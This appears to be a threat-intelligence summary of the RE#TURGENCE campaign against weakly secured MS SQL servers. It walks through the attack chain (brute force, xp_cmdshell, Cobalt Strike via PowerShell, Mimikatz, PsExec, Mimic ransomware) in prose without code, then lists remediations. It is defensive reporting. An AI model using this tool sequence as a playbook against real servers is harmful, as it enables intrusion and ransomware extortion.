In the realm of recent cybersecurity advancements, a notable financially motivated campaign has come to light, specifically focusing on Microsoft SQL (MS SQL) servers with inadequate security measures across the United States, the European Union, and Latin American (LATAM) regions. This continuous and evolving campaign, credited to actors of Turkish origin and given the designation RE#TURGENCE by researchers at Securonix, serves as a stark reminder of the enduring global menace to cybersecurity. The assailants demonstrate a high level of sophistication through their multi-stage approach, which involves the exploitation of vulnerabilities, the strategic use of legitimate tools, and the deployment of ransomware with the primary objective of financial gain. This multifaceted strategy emphasizes the severity and complexity of the threat posed by these cyber adversaries.

 

Technical Details:

Turkish hackers, exploits poorly secured MS SQL servers globally through brute-force attacks and the xp_cmdshell option. It involves a multi-stage process:

• Initial Access: Brute force on MS SQL servers.
• Exploitation: Use of xp_cmdshell to execute commands.
• Payload: Retrieval of Cobalt Strike via PowerShell.
• Toolkit: AnyDesk downloaded for remote access, along with tools like Mimikatz and Advanced Port
• Lateral Movement: PsExec utility for executing programs on remote hosts.
• Ransomware: Deployment of Mimic ransomware for financial motives.
• OPSEC Blunder: Monitoring clipboard activity reveals Turkish origins and online alias "atseverse."
• Differentiation: Unique characteristics distinguish RE#TURGENCE from prior campaigns, emphasizing the use of legitimate tools.

 

Initial Access:

The threat actors initiate the attack by employing brute-force attacks on vulnerable MS SQL servers, replicating a methodology seen in a previous campaign called DB#JAMMER (September 2023). Following successful infiltration, the xp_cmdshell configuration option is utilized to execute shell commands on the compromised host.

 

Post-Exploitation Toolkit:

Once initial access is achieved, the attackers retrieve a PowerShell script from a remote server. This script is responsible for fetching an obfuscated Cobalt Strike beacon payload, laying the groundwork for subsequent malicious activities.

 

Tool Utilization:

The post-exploitation phase involves downloading the AnyDesk remote desktop application from a network share, facilitating unauthorized access to the compromised machine. Additional tools, such as Mimikatz for credential harvesting and Advanced Port Scanner for reconnaissance, are downloaded using the compromised system.

 

Lateral Movement:

Legitimate system administration utility PsExec is leveraged for lateral movement, enabling the execution of programs on remote Windows hosts. This strategic choice allows the threat actors to maneuver within the network and expand their reach.

 

Ransomware Deployment:

The attack chain concludes with the deployment of Mimic ransomware, a variant previously associated with the DB#JAMMER campaign. Notably, RE#TURGENCE opts for a more targeted approach, utilizing legitimate tools to blend in with normal network activity.

 

Operational Security Oversight:

Securonix uncovered an operational security (OPSEC) oversight made by the threat actors. Clipboard activity monitoring became possible due to the enabled clipboard sharing feature in AnyDesk. This lapse revealed the Turkish origins of the attackers and their online alias, ‘atseverse,’ which corresponds to profiles on Steam and a Turkish hacking forum called SpyHack.

 

Remediation Steps:

• Network Segmentation: Isolate critical servers from direct internet exposure to mitigate brute-force attacks from external sources.
• Enhanced Authentication: Implement strong password policies and consider multi-factor authentication to bolster defenses against brute-force attempts.
• Regular Audits: Conduct routine security audits, including vulnerability assessments, to identify and patch potential weaknesses.
• Application Whitelisting: Limit the execution of applications to authorized ones, reducing the risk of unauthorized tools being employed.
• Monitoring Clipboard Activity: Disable unnecessary features like clipboard sharing in remote desktop applications to minimize the risk of OPSEC lapses.